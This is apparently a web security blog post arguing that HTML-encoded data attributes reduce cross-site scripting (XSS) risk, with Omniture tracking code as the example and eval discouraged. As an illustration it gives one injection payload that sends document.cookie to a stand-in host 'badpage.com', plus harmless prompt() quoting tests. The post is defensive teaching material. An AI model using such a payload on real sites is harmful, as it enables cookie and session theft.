HTML data attributes – stop my XSS

First, a disclaimer for the TL;DR crowd – data attributes alone will not stop all XSS, mine or anyone else’s. You have to apply them correctly, and use them properly.

However, I think you’ll agree with me that it’s a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.

Next, a reminder about my theory of XSS – that there are four parts to an XSS attack – Injection, Escape, Attack and Cleanup. Injection is necessary and therefore can’t be blocked, Attacks are too varied to block, and Cleanup isn’t always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.

Now let’s set up the code we’re trying to protect – say we want to have a user-input value accessible in JavaScript code. Maybe we’re passing a search query to Omniture (by far the majority of JavaScript Injection XSS issues I find). Here’s how it often looks:

<script>
s.prop1="mysite.com";
s.prop2="SEARCH-STRING";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//—>
</script>

Let’s suppose that “SEARCH-STRING” above is the string for which I searched.

I can inject my code as a search for:

"-window.open("//badpage.com/"+document.cookie,"_top")-"

The second line then becomes:

s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";

Yes, I know you can’t subtract two strings, but JavaScript doesn’t know that until it’s evaluated the window.open() function, and by then it’s too late, because it’s already executed the bad thing. A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.

How do data attributes fix this?

A data attribute is an attribute in an HTML tag, whose name begins with the word “data” and a hypen.

These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.

Data attributes on table cells can be associated to the data within that cell, data attributes on a body tag can be associated to the whole page, or the context in which the page is loaded.

Because data attributes are HTML attributes, quoting their contents is easy. In fact, there’s really only a couple of quoting rules needed to consider.

  1. The attribute’s value must be quoted, either in double-quote or single-quote characters, but usually in double quotes because of XHTML
  2. Any ampersand (“&”) characters need to be HTML encoded to “&amp;”.
  3. Quote characters occurring in the value must be HTML encoded to “&quot;

Rules 2 & 3 can simply be replaced with “HTML encode everything in the value other than alphanumerics” before applying rule 1, and if that’s easier, do that.

Sidebar – why those rules?

HTML parses attribute value strings very simply – look for the first non-space character after the “=” sign, which is either a quote or not a quote. If it’s a quote, find another one of the same kind, HTML-decode what’s in between them, and that’s the attribute’s value. If the first non-space after the equal sign is not a quote, the value ends at the next space character.
Contemplate how these are parsed, and then see if you’re right:

  • <a onclick="prompt("1")">&lt;a onclick="prompt("1")"&gt;</a>

  • <a onclick = "prompt( 1 )">&lt;a onclick = "prompt( 1 )"&gt;</a>

  • <a onclick= prompt( 1 ) >&lt;a onclick= prompt( 1 ) &gt;</a>

  • <a onclick= prompt(" 1 ") >&lt;a onclick= prompt(" 1 ") &gt;</a>

  • <a onclick= prompt( "1" ) >&lt;a onclick= prompt( "1" ) &gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#9;"prompt( 1 )"&gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#32;"prompt( 1 )"&gt;</a>

  • <a onclick= thing=1;prompt(thing)>&lt;a onclick= thing=1;prompt(thing)&gt;</a>

  • <a onclick="prompt(\"1\")">&lt;a onclick="prompt(\"1\")"&gt;</a>

Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?

Here’s how they look in the Debugger in Internet Explorer 11:

image

Uh… That’s not right, particularly line 8. Clearly syntax colouring in IE11’s Debugger window needs some work.

OK, let’s try the DOM Explorer:

image

Much better – note how the DOM explorer reorders some of these attributes, because it’s reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).

Other browsers have similar capabilities, of course – use whichever one works for you.

Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.

Back to the data-attributes

So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named “data-something-or-other”.

Accessing these tags from basic JavaScript is easy. You first need to get access to the DOM object representing the tag – if you’re operating inside of an event handler, you can simply use the “this” object to refer to the object on which the event is handled (so you may want to attach the data-* attributes to the object which triggers the handler).

If you’re not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way – usually document.getElementById(…)

Once you have the object, you can query an attribute with the function getAttribute(…) – the single argument is the name of the attribute, and what’s returned is a string – and any HTML encoding in the data-attribute will have been decoded once.

Other frameworks have ways of accessing this data attribute more easily – for instance, JQuery has a “.data(…)” function which will fetch a data attribute’s value.

How this stops my XSS

I’ve noted before that stopping XSS is a “simple” matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.

If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function – HTML Encode – and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). That’s a lot easier than trying to understand multiple injection contexts each with their own encoding function. It’s a lot easier to protect the inclusion of arbitrary user data in your web pages, and you’ll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isn’t a bad thing at all.

One final gotcha

You can still kick your own arse.

When converting user input from the string you get from getAttribute to a numeric value, what function are you going to use?

Please don’t say “eval”.

Eval is evil. Just like innerHtml and document.write, its use is an invitation to Cross-Site Scripting.

Use parseFloat() and parseInt(), because they won’t evaluate function calls or other nefarious components in your strings.

So, now I’m hoping your Omniture script looks like this:

<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
<script>
s.prop1="mysite.com";
s.prop2=document.getElementById("myDataDiv").getAttribute("data-search-term");
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//—>
</script>

You didn’t forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?

P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.